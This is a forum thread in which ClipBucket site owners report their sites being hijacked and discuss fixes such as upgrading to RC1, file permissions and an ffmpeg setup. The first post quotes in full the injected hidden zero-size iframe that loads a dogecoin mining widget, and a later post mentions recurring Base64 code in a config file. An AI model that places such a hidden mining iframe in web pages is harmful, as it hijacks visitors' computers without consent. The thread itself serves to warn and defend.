I found malware in my clip bucket based websites


#1

HI,
yesterday controlweb support team give me hint about “mining crypto” when i open one of my clipbucket based website my laptop FAN speed is increase, then i check task manager and browser used 100% of CPU. when i check the source code in browser i found iframe code.

 <iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dogecoin/?ref=A8A753AC56DB&mode=widget" style="overflow:hidden;width:0px;height:0px;">

then i download all files from the server and search, scan but i can’t find any code like that. then i upgrade my websites to 4.1 RC1 and the iframe code is gone.

on my server more than 10 websites hosted only 2 is clipbucket based and i found that code only in clipbucket based website.

i don’t know how clipbucket sites hijacked.

after that i search “Forged By ClipBucket” keyword in google and i found more websites that are also hijacked bellow is 2 websites that i found on google.

> http://zeekly.com/
> http://myshopaze.com/

and maybe there is more infected site… check yours and clean it.

sorry in advance my English is not good.

Regards


#2

I don’t know why but I don’t have this issue.

Are you folder permission setup to 755 and file permission to 644? If not setup folder permissions to 755 and file permissions to 644 and if you have setup the permission for public_html to 750 and the link www to 777


#3

the issue is not only with me … i randomly found cb websites in google and found that issue also.


#4

Hello Arman,

Here are some fixes we implemented after Controlweb team reported security issues:

We are still working on making the script more secure to vulnerabilities.


#5

yes that is happening on my site too, and the code they add on file config,inc inside includes every few days appear again the Base64 code on top of the code. i remove and few days later they add again. in every one of my cb installations


#6

Same problem here, an Iframe with the url coinpot.co


#7

Can you please share some of your urls so we can help to find solutions?


#8

check my 1st post i have share 2 url that infected with mining script.


#9

you upload rc1 from github and now its work or still issue ??


#10

RC1 is working fine… till now


#11

@Arman what server you use centos 7 php7 control Panel ?

i need help with ffmpeg ffprobe etc etc i have centos 7 can use php5.2 - 7.2 in changer and plesk for control panel can you give me direction please, seems like centos 7 is pain in the ash to get all coedecs working correctly


#12

i am using
Centos 7
VestaCP with PHP 5.6.33

FFMPEG and Required plugin from guide.
https://discourse.clipbucket.com/t/latest-ffmpeg-installation-centos-6-7-ffmpeg-mp4-flv-mplayer/2790
and work fine for me…

plesk is not good use free vestacp and very very simple and lightweight…


#13

How to check the presence of malware on my web site?


#14

http://hdhoster.com

webhosting